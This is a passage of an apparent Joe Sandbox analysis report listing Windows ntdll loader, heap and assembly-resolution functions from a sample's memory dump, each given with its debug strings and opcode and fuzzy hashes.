                                                                    • Opcode Fuzzy Hash: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                    • Instruction Fuzzy Hash: 64E04F712102147BD120EA6ADC41F9BB76CDBC5714F40802AFA08A7281C670B90187F4
                                                                    Function 29012C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 140 29012c0a-29012c0f 141 29012c11-29012c18 140->141 142 29012c1f-29012c26 LdrInitializeThunk 140->142
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 12c6ee5e5b1a6619e960f55590a30b656a94986e193380dccaaf00a35df74843
                                                                    • Instruction ID: 8941a6d978e43f92ca1933383a835745fadef2bc25e5dffb3911dd38604027c8
                                                                    • Opcode Fuzzy Hash: 12c6ee5e5b1a6619e960f55590a30b656a94986e193380dccaaf00a35df74843
                                                                    • Instruction Fuzzy Hash: C7B09B71D019C9C6E605E7644609707794467E0701F15C473D3030741F4738C1D2E5B5

                                                                    Non-executed Functions

                                                                    Function 29088D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 29088F3F
                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 29088F26
                                                                    • The resource is owned shared by %d threads, xrefs: 29088E2E
                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 29088E02
                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 29088E4B
                                                                    • The critical section is owned by thread %p., xrefs: 29088E69
                                                                    • The instruction at %p tried to %s , xrefs: 29088F66
                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 29088D8C
                                                                    • *** then kb to get the faulting stack, xrefs: 29088FCC
                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 29088E86
                                                                    • a NULL pointer, xrefs: 29088F90
                                                                    • write to, xrefs: 29088F56
                                                                    • *** enter .cxr %p for the context, xrefs: 29088FBD
                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 29088E3F
                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 29088DB5
                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 29088F34
                                                                    • The resource is owned exclusively by thread %p, xrefs: 29088E24
                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 29088DA3
                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 29088DC4
                                                                    • *** enter .exr %p for the exception record, xrefs: 29088FA1
                                                                    • This failed because of error %Ix., xrefs: 29088EF6
                                                                    • Go determine why that thread has not released the critical section., xrefs: 29088E75
                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 29088FEF
                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 29088F2D
                                                                    • <unknown>, xrefs: 29088D2E, 29088D81, 29088E00, 29088E49, 29088EC7, 29088F3E
                                                                    • *** Inpage error in %ws:%s, xrefs: 29088EC8
                                                                    • read from, xrefs: 29088F5D, 29088F62
                                                                    • an invalid address, %p, xrefs: 29088F7F
                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 29088DD3
                                                                    • The instruction at %p referenced memory at %p., xrefs: 29088EE2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                    • API String ID: 0-108210295
                                                                    • Opcode ID: 5b867da8b267fd4b7cdb7c462dc9d8dd8d7f5d403826251051fa560d00d0fe18
                                                                    • Instruction ID: d392b15c212702ce5ba3dc64bd222939c2091b2b9dbba0f61044e4800f242dc9
                                                                    • Opcode Fuzzy Hash: 5b867da8b267fd4b7cdb7c462dc9d8dd8d7f5d403826251051fa560d00d0fe18
                                                                    • Instruction Fuzzy Hash: D3810175A0111CBFCB15CB108C84E6F3B76FF66790F054864FA186F216E3758643CA6A
                                                                    Function 29052349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2160512332
                                                                    • Opcode ID: be7d44fc81f5b10b5661f4e7376f30da70a008663256a792725a3e4f6e41ceac
                                                                    • Instruction ID: cf31ea23dbaa54623d97c60b4203bb603f79a203ed7d02ec48b5ae9c9771caed
                                                                    • Opcode Fuzzy Hash: be7d44fc81f5b10b5661f4e7376f30da70a008663256a792725a3e4f6e41ceac
                                                                    • Instruction Fuzzy Hash: D3927975608349ABE324CF28C880B5BB7E9BF88754F004D2DFA96D7251D770E946CB92
                                                                    Function 290029F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 290422E4
                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 29042602
                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 290425EB
                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 2904261F
                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 29042412
                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 29042498
                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 29042624
                                                                    • @, xrefs: 2904259B
                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 290424C0
                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 29042409
                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 29042506
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                    • API String ID: 0-4009184096
                                                                    • Opcode ID: 47ade21600e1aefef2b31c72b2c4fc599948dc9f8d4f26ece73d932d73635358
                                                                    • Instruction ID: e06a82f1062e10ef2515a0f3da2743958b13c2cff21cdcda74b34af46b374b0c
                                                                    • Opcode Fuzzy Hash: 47ade21600e1aefef2b31c72b2c4fc599948dc9f8d4f26ece73d932d73635358
                                                                    • Instruction Fuzzy Hash: 0D0250F1D0122C9BEB25CB18CD90B9DB7B8AF58314F4055EAA608A7241EB309FC5CF59
                                                                    Function 29078B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                    • API String ID: 0-2515994595
                                                                    • Opcode ID: 800aaf4f8da6255553599e7261c2707c99cc1cd233854e3ca4a7c28f82bbd9bf
                                                                    • Instruction ID: df6702565d884c20a9bb9f95c9293f005bb6d5e4e9060e7f593fab6264c0ae00
                                                                    • Opcode Fuzzy Hash: 800aaf4f8da6255553599e7261c2707c99cc1cd233854e3ca4a7c28f82bbd9bf
                                                                    • Instruction Fuzzy Hash: 53519F715053599BC329CF1888D4BEBB7FDEF94260F204E2EAD9883241E770D646C79A
                                                                    Function 28FEAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                    • API String ID: 0-3197712848
                                                                    • Opcode ID: 932b847e99d9d36308fc9596216155fc34b0a8b447f0f478434caff42d873d43
                                                                    • Instruction ID: d33018c3212951637dc7011583ecffa5af5dc1e0259a1c9fb25a46399d378bae
                                                                    • Opcode Fuzzy Hash: 932b847e99d9d36308fc9596216155fc34b0a8b447f0f478434caff42d873d43
                                                                    • Instruction Fuzzy Hash: 381236B1A0A385DFD324CF24C480BAAB3E6FF94704F44496EF9889B291E734D955C792
                                                                    Function 29080CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                    • API String ID: 0-1357697941
                                                                    • Opcode ID: 57b3b989713db2b6efa0ab9be96160e205024d12277f9014d29d538630145ea4
                                                                    • Instruction ID: ec3091cb20956788ec7a40ff22f63f9d62a0bac70fbe10f5eda29f4e5506d1a4
                                                                    • Opcode Fuzzy Hash: 57b3b989713db2b6efa0ab9be96160e205024d12277f9014d29d538630145ea4
                                                                    • Instruction Fuzzy Hash: 8DF12435B0524AEFCB19CF64C480FEAB7F6FF09354F048969E5859BA42D730AA46CB50
                                                                    Function 29002F98 Relevance: 9.1, Strings: 7, Instructions: 307COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 29042881
                                                                    • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 290429B1
                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 2904292E
                                                                    • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 29042856
                                                                    • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 290429AC
                                                                    • @, xrefs: 29003180
                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 290428B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                    • API String ID: 0-541586583
                                                                    • Opcode ID: c45bf996503546dc0ea4eeaec0492cd56d42e86eeaf626e177157b208968489d
                                                                    • Instruction ID: 7cf3ead1fc164b85379bbfe47593b81b11be3da714e1f09756273fa3b9b1db70
                                                                    • Opcode Fuzzy Hash: c45bf996503546dc0ea4eeaec0492cd56d42e86eeaf626e177157b208968489d
                                                                    • Instruction Fuzzy Hash: 47C1BF75E0122DABEB259F19CC94BAAB3F5AF58740F0044E9E94CA7250E7349E82CF51
                                                                    Function 290589B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • VerifierFlags, xrefs: 29058C50
                                                                    • AVRF: -*- final list of providers -*- , xrefs: 29058B8F
                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 29058A3D
                                                                    • VerifierDlls, xrefs: 29058CBD
                                                                    • VerifierDebug, xrefs: 29058CA5
                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 29058A67
                                                                    • HandleTraces, xrefs: 29058C8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                    • API String ID: 0-3223716464
                                                                    • Opcode ID: 1bc23c154062c66645ef9e6dbb7e4a5d30d2158ed363800df0ca2c13f3113c48
                                                                    • Instruction ID: e3d75363fa50c6322693a8f5afd6ac66a68caa24e093779990d342053112a675
                                                                    • Opcode Fuzzy Hash: 1bc23c154062c66645ef9e6dbb7e4a5d30d2158ed363800df0ca2c13f3113c48
                                                                    • Instruction Fuzzy Hash: B991FF7590A64DEFE315DF28C880B0E77E9BFA4750F414C68EE42AB251D7349902CB99
                                                                    Function 29054DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrpGenericExceptionFilter, xrefs: 29054DFC
                                                                    • Execute '.cxr %p' to dump context, xrefs: 29054EB1
                                                                    • ***Exception thrown within loader***, xrefs: 29054E27
                                                                    • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 29054E38
                                                                    • minkernel\ntdll\ldrutil.c, xrefs: 29054E06
                                                                    • LdrpProtectedCopyMemory, xrefs: 29054DF4
                                                                    • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 29054DF5
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                    • API String ID: 0-2973941816
                                                                    • Opcode ID: e3ebad2ac237ca4f945810700a0aa482ba66d4dfac7d34aae9c0d40fba7a00fe
                                                                    • Instruction ID: 2b9141ed8e05546f97b86d03f84ef905394601fc9a857ca197a1bdabdae94f99
                                                                    • Opcode Fuzzy Hash: e3ebad2ac237ca4f945810700a0aa482ba66d4dfac7d34aae9c0d40fba7a00fe
                                                                    • Instruction Fuzzy Hash: 3E21467624100DFED3088B6DDC85EAA77EEFF45AA0F208921E21BB7544C520EA13C261
                                                                    Function 28FDEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                    • API String ID: 0-1109411897
                                                                    • Opcode ID: bc077242fc0ece5679f1ee2e070f7ebbe0397232612da1afa2ad7d64576f39bb
                                                                    • Instruction ID: c12643060d5590ccdceaf0855ce5a4e1b9af490098f86b104fc338176a5808b3
                                                                    • Opcode Fuzzy Hash: bc077242fc0ece5679f1ee2e070f7ebbe0397232612da1afa2ad7d64576f39bb
                                                                    • Instruction Fuzzy Hash: F5A23976A066298FDB64CF14CC88B9DB7B2EF45304F5546EAD90CAB250EB359E81CF04
                                                                    Function 28FDADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                    • API String ID: 0-4098886588
                                                                    • Opcode ID: 1190fe5dda5760f435c9500651b81136a1b3d436a74154af37d0598e711a134d
                                                                    • Instruction ID: fe165d65b7b5c805cac5ca402e8d7314914659ade3a69f4541779663f3efa6ff
                                                                    • Opcode Fuzzy Hash: 1190fe5dda5760f435c9500651b81136a1b3d436a74154af37d0598e711a134d
                                                                    • Instruction Fuzzy Hash: 4032DF7290226DDBDB26CF14C888BDEB7B6AF45340F5841EAEA48A7251D7319F81CF44
                                                                    Function 290063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-792281065
                                                                    • Opcode ID: 2f8e131f0540a83460ec377a677dafe7c596b4a6482f9e62b1ef69e8815def18
                                                                    • Instruction ID: f3f72a8c222e126f7d6b7286ab2c5c2033f79e1310a0d9d586ef889229a0fd63
                                                                    • Opcode Fuzzy Hash: 2f8e131f0540a83460ec377a677dafe7c596b4a6482f9e62b1ef69e8815def18
                                                                    • Instruction Fuzzy Hash: 93917370E0126CABE728DF90D894B9E37E2AF14764F105A39E9086B281E7789843C7D1
                                                                    Function 29002CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 2904279C
                                                                    • \WinSxS\, xrefs: 29002E23
                                                                    • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 2904276F
                                                                    • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 29042706
                                                                    • .Local\, xrefs: 29002D91
                                                                    • @, xrefs: 29002E4D
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                    • API String ID: 0-3926108909
                                                                    • Opcode ID: e43e8411a57988c686a51784a619934ba27c1cb76254c8554cb714f6d9700270
                                                                    • Instruction ID: 80aec2b7e018c4be0c9b4ec0c96da57900ea51e40078c72f4282ffb4d2874801
                                                                    • Opcode Fuzzy Hash: e43e8411a57988c686a51784a619934ba27c1cb76254c8554cb714f6d9700270
                                                                    • Instruction Fuzzy Hash: 3981BCB1504349DFE706CF18C4A0A6BB7E8BF99700F418D6AF984DB241D774DA45CBA2
                                                                    Function 2901096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 29012DF0: LdrInitializeThunk.NTDLL ref: 29012DFA
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29010BA3
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29010BB6
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29010D60
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29010D74
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 1404860816-0
                                                                    • Opcode ID: 868a94e679232716f041b784f5c17f5825086eadf11d549713e1f903ff145390
                                                                    • Instruction ID: b971d49a9664cd8a7a8a572723299ce2682395eced62c9da8caf874997091f2b
                                                                    • Opcode Fuzzy Hash: 868a94e679232716f041b784f5c17f5825086eadf11d549713e1f903ff145390
                                                                    • Instruction Fuzzy Hash: FB426D75900719DFDB24CF68C841B9AB7F5BF04300F1489BAE999EB241D770AA85CF61
                                                                    Function 29054F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                    • API String ID: 0-2518169356
                                                                    • Opcode ID: f67a7b660fed264a9996115cd63d40705089171667e989bb6a77a9573a81a29f
                                                                    • Instruction ID: 1e01e9d97076a357315d84cceacf5671ed34996d8fa80fbf6aba8b68a2d0fa3f
                                                                    • Opcode Fuzzy Hash: f67a7b660fed264a9996115cd63d40705089171667e989bb6a77a9573a81a29f
                                                                    • Instruction Fuzzy Hash: B491CF7290061DCBCB14CFA8C881AAEB7F5FF49310F55496AE906E7350E735DA42CB94
                                                                    Function 28FDA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                    • API String ID: 0-379654539
                                                                    • Opcode ID: 49a4ed185089aac96d479fcdddd91f4e8ec6198f63eedcfe3e50bbf3173d9db4
                                                                    • Instruction ID: 04a6aeeb2044834995bcfae93fd407f0107e452f8414e2ada4ddc769add4273a
                                                                    • Opcode Fuzzy Hash: 49a4ed185089aac96d479fcdddd91f4e8ec6198f63eedcfe3e50bbf3173d9db4
                                                                    • Instruction Fuzzy Hash: B0C1C076109386CFC715CF28C040B5AB7E6FF89704F08896AFA95CB251E734CA56CB5A
                                                                    Function 28FE0C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • HEAP: , xrefs: 290354E0, 290355A1
                                                                    • HEAP[%wZ]: , xrefs: 290354D1, 29035592
                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 290355AE
                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 290354ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
